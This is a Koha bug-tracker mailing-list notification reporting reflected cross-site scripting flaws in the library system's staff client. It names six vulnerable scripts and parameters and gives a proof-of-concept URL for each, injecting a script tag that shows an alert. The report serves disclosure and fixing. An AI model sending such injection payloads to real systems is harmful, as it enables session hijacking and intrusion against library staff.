[Koha-bugs] [Bug 14568] New: XSS in Staff Client

bugzilla-daemon Mon, 20 Jul 2015 02:32:26 -0700

http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14568


            Bug ID: 14568
           Summary: XSS in Staff Client
 Change sponsored?: ---
           Product: Koha
           Version: master
          Hardware: All
                OS: All
            Status: NEW
          Severity: normal
          Priority: P5 - low
         Component: Staff Client
          Assignee: [email protected]
          Reporter: [email protected]
        QA Contact: [email protected]
                CC: [email protected]

Cross site scripting vulnerabilities found in Staff Client

detail.pl - param biblionumber
cgi-bin/koha/catalogue/detail.pl?biblionumber=1<script
type="text/javascript">alert("hello")</script>

ISBDdetail.pl - param biblionumber
cgi-bin/koha/catalogue/ISBDdetail.pl?biblionumber=1<script
type="text/javascript">alert("hello")</script>

MARCdetail.pl - param biblionumber
cgi-bin/koha/catalogue/MARCdetail.pl?biblionumber=1<script
type="text/javascript">alert("hello")</script>

moredetail.pl - param biblionumber
cgi-bin/koha/catalogue/moredetail.pl?biblionumber=1<script
type="text/javascript">alert("hello")</script>

request.pl - param biblionumber
cgi-bin/koha/reserve/request.pl?biblionumber=1"><script
type="text/javascript">alert("hello")</script>

viewlog.pl - param object
cgi-bin/koha/tools/viewlog.pl?do_it=1&modules=CATALOGUING&action=MODIFY&object=462688<script
type="text/javascript">alert("hello")</script>

-- 
You are receiving this mail because:
You are watching all bug changes.
You are the assignee for the bug.
_______________________________________________
Koha-bugs mailing list
[email protected]
http://lists.koha-community.org/cgi-bin/mailman/listinfo/koha-bugs
website : http://www.koha-community.org/
git : http://git.koha-community.org/
bugs : http://bugs.koha-community.org/

[Koha-bugs] [Bug 14568] New: XSS in Staff Client

Reply via email to